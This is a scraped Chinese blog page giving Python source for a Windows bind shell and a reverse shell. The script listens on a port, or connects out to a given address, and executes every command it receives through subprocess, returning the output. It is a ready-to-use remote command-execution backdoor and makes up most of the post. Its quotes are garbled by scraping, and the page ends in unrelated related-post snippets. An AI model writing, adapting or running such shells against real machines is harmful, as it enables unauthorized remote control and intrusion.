2. 程式人生 > >Windows正向綁定shell和反向反彈shell的Python代碼

Windows正向綁定shell和反向反彈shell的Python代碼

阿新 發佈:2018-10-12
反彈 RoCE 無法 效果 bre optparser eas rev all

Windows下的shell原理

經過查閱資料,使用os.dup2(nfd, ofd)的方式重定向socket的輸入輸出到windows系統的cmd是無法做到的,屬於系統原因,不能直接復制Linux下的方案,所以只能寫程序收集socket的輸入,調用subprocess.Popen去執行,然後獲取輸出後在返回給socket。

Python源代碼

# -*- coding:utf-8 -*-


# 引入依賴的庫、包、模塊
import os
import select
import socket
import subprocess
from optparse import OptionParser


# 定義shell函數
def BindConnect(addr, port):
    ‘‘‘正向連接shell‘‘‘
    try:
        shell = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        shell.bind((addr,port))
        shell.listen(1)
    except Exception as reason:
        print (‘[-] Failed to Create Socket : %s‘%reason)
        exit(0)
    client, addr = shell.accept()
    rlist = [shell, client]
    wlist = []
    elist = [shell, client]
    while True:
        client.send("bobac‘s-shell#")
        rs,ws,es = select.select(rlist,wlist,wlist)
        for sockfd in rs:
            if sockfd == client:
                command = client.recv(1024)
                if command == ‘exit‘:
                    shell.close()
                    client.close()
                    break
                result, error = subprocess.Popen(command,shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).communicate()
                client.sendall(result.decode("GB2312").encode("UTF-8"))


def ReserveConnect(addr, port):
    ‘‘‘反彈連接shell‘‘‘
    try:
        shell = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        shell.connect((addr,port))
    except Exception as reason:
        print (‘[-] Failed to Create Socket : %s‘%reason)
        exit(0)
    rlist = [shell]
    wlist = []
    elist = [shell]
    while True:
        shell.send("bobac‘s-shell#")
        rs,ws,es = select.select(rlist,wlist,wlist)
        for sockfd in rs:
            if sockfd == shell:
                command = shell.recv(1024)
                if command == ‘exit‘:
                    shell.close()
                    break
                result, error = subprocess.Popen(command,shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).communicate()
                shell.sendall(result.decode("GB2312").encode("UTF-8"))


# 主函數運行
if __name__ == "__main__":
    optParser = OptionParser()
    optParser.add_option(‘-r‘,‘--reverse‘, action=‘store_true‘, dest=‘reverse‘)
    optParser.add_option(‘-b‘,‘--bind‘, action=‘store_true‘, dest=‘bind‘)
    optParser.add_option("-a","--addr", dest="addr")
    optParser.add_option("-p","--port", dest="port")
    options , args = optParser.parse_args()
    if options.reverse:
        ReserveConnect(options.addr, int(options.port))
    elif options.bind:
        BindConnect(options.addr, int(options.port))

運行效果如圖

技術分享圖片
技術分享圖片
技術分享圖片
技術分享圖片

Windows正向綁定shell和反向反彈shell的Python代碼

相關推薦

Windows正向shell反向反彈shell的Python

反彈 RoCE 無法 效果 bre optparser eas rev all Windows下的shell原理 經過查閱資料,使用os.dup2(nfd, ofd)的方式重定向socket的輸入輸出到windows系統的cmd是無法做到的,屬於系統原因,不能直接復制Li

針對用戶在個人中心手機認證的一些js

提示 hid 信息 sub 是否 可用 號碼 驗證碼 點擊 需求: 1:手機號碼校驗(格式的校驗,手機號碼是否已經綁定過)---未實現 2:填完手機號碼,點擊發送驗證碼,手機會收到一條信息 3:發送驗證碼按鈕不可用,變成重新發送的倒計時 1):60秒以後又可以

華為三層交換機IPMAC地址基礎命令

流程 bsp tab mac地址 基本 tegra 端口 root權限 如果 //本文檔主要介紹交換機地址綁定基本流程和用到的命令; //不記得命令可以輸入?查看,或在一段命令中用‘TAB’鍵進行命令補全:如”user-b s mac-a ‘TAB‘ //此處,將自動補全命

JS事件移除事件的處理方法

nbsp 觸發 ner 它的 msu eve code ont 一個 addEventListener()與removeEventListener()用於處理指定和刪除事件處理程序操作。全部的DOM節點中都包括這兩種方法,而且它們都接受3個參數:要處理的事件名、作為事件

python基礎之多態與多態性、方法方法

info lib img 感知 animal user save python基礎 assm 多態與多態性 多態 多態並不是一個新的知識 多態是指一類事物有多種形態,在類裏就是指一個抽象類有多個子類,因而多態的概念依賴於繼承 舉個栗子:動物有多種形態,人、狗、貓、豬等,py

5.10 方法方法

自身 傳值 body charm 參數 tor onf IT self. 類中定義的函數分成兩大類 一:綁定方法(綁定給誰,誰來調用就自動將它本身當作第一個參數傳入): 綁定到類的方法:用classmethod裝飾器裝飾的方法。 為類量身定制

屬性方法

fun alert 調用 script 封裝 turn light scrip asc <div style="top:100px" id="app02"> {{ Name }} <br /> {{ Age }}

正向查找區域反向查找區域的操作教程(內提供系統鏡像下載)

watermark 連通 不出 統一 p地址 命令 win roc 教程 這篇跟大家分享正反向查找區域的操作。系統鏡像下載鏈接:https://pan.baidu.com/s/114IKLwYoDFtI3vOnudmV9Q首先大家準備一個Windows server版本的服

淺談jquery之on()事件off()解除事件

span syntax num this code value 自己 冒泡 屬性 off()函數用於移除元素上綁定的一個或多個事件的事件處理函數。 off()函數主要用於解除由on()函數綁定的事件處理函數。 該函數屬於jQuery對象(實例)。 語法 jQuery

nginx服務器域名設置根目錄的方法

使用 服務 退出 首頁 多站點 spa 啟動 list 引入   nginx服務器綁定域名以及設置根目錄非常方便,首先進入nginx安裝目錄,然後執行 vim conf/nginx.conf 打開nginx的配置文件,找到   server {     .....     

Nginx禁止未域名IP訪問443端口

href ofo 配置 http 開啟 ssl證書 turn 綁定 配置https 問題:例,a.xxx.com 開啟了https,訪問https://a.xxx.com ,正常,訪問未配置https的域名,如 https://b.xxx.com 會打開https://a.

給類,實例屬性方法

comm tle obj odt 實例 () code pes method class Student(object): pass >>> s = Student() >>> s.name = ‘Michael‘ # 動態給實

格式化輸出IIS格式批量解析域名

let format main 文件名 roo nbsp nagios wc -l read sh name.sh yuming.txt yuming_bak.txtfor name in `cat $1`do echo "www.$name||:80:www

vue 中動態class style的方法

tail use thead node tps == sdn span tails 先列舉一些例子 :class="[‘content‘,{‘radioModel‘:checkType}]" :class="[‘siteAppListDirNode‘,{open:

Python中的方法方法

約定 iges 方法 per icm 內部 ict 定義 kitty 綁定方法 類中定義的方法大致可以分為兩類:綁定方法和非綁定方法。其中綁定方法又可以分為綁定到對象的方法和綁定到類的方法~ 綁定到對象的方法 在類中沒有被任何裝飾器修飾的方法就是 綁定到對象的方法,這類方法

C#控制Windows系統關機、重啟註銷的

rgs res nsh gof oid win shu eve nta 如下資料是關於C#控制Windows系統關機、重啟和註銷的代碼。 protected void btnShutDown_Click(object sender, EventArgs e)

html5中制作loading圖標圖片預覽詳解

eight -c html5 圖片 nec lin lib jpg truct zh-cn html5制作loading圖的示例 代碼如下: <!DOCTYPE html><html><head><title><

C++ UTF8UTF16互轉

define iter 般的 != ont for efault 互轉 小端 簡介 1、這段代碼只考慮在小端序情況下的轉換(一般的機器都是的)。2、這段代碼需要C++11的支持(只是用到了u16string),如果不支持,可以添加下面代碼 typedef uin

通過遊戲學python 3.6 第一季 第三章 實例項目 猜數字遊戲--核心--猜測次數--隨機函數屏蔽錯誤--優化及註釋 可復制直接使用 娛樂 可封裝 函數

nbsp 退出 而不是 判斷 and 封裝 except 次數 img 1 #猜數字--核心代碼--猜測次數--隨機函數和屏蔽錯誤代碼---優化代碼及註釋 2 3 import random 4 number = random.randint(1,

通過遊戲學python 3.6 第一季 第九章 實例項目 猜數字遊戲--核心代碼--猜測次數--隨機函數屏蔽錯誤代碼--優化代碼及註釋--簡單賬號密碼登陸--賬號的註冊查詢密碼的找回修改--鎖定賬號--鎖定次數--菜單功能'menufile

lock isp 無限循環 lis true 條件判斷 elif bre format 通過遊戲學python 3.6 第一季 第九章 實例項目 猜數字遊戲--核心代碼--猜測次數--隨機函數和屏蔽錯誤代碼--優化代碼及註釋--簡單賬號密碼登陸--賬號的註冊查詢和密碼的